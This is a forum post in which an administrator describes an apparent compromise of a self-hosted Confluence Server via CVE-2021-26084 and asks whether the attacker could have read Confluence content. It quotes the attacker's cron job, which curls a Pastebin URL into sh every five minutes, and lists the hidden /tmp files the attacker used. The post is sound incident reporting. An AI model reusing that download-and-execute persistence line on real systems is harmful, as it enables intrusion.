Hello everyone,

we are self-hosting Confluence Server for our few users and were noticing a crash of our instance last Friday (2021-09-10). Yesterday (2021-09-13) we discovered some suspicious processes on our server seemingly started by the confluence user that were taking up 100% CPU on our server, leading to both our Confluence and our Jira crash again.

Based on our research until now and some Q/A that we read here, we are assuming that we were very likely hit by CVE-2021-26084 (https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html ) and someone managed to inject malicious processes on our server. We immediately killed all processes by the confluence user (including confluence itself) and found a Cron-Job for the confluence user, pulling down something from Pastebin and executing the code:

*/5 * * * * curl -fsSL https://pastebin.com/raw/<REDACTED> | sh

Next to that, we found suspicious files/folders in the /tmp-directory which were used by the processes:

/tmp/.solr
/tmp/.kkli
/tmp/conf.n

Our checks for malicious activities or files are still ongoing. Obviously we are trying to take all necessary measurements and find out whether and how much data from our Confluence itself was accessed.

Using the exploit named in the linked CVEs, is it possible that the attacker had access to actual content from our Confluence? Since the malicious processes were running under the confluence user, it would theoretically be possible that the attacker could read the database configuration and access the data, no? We couldn't really find information about that in the linked articles so far.

Thank you in advance for your help!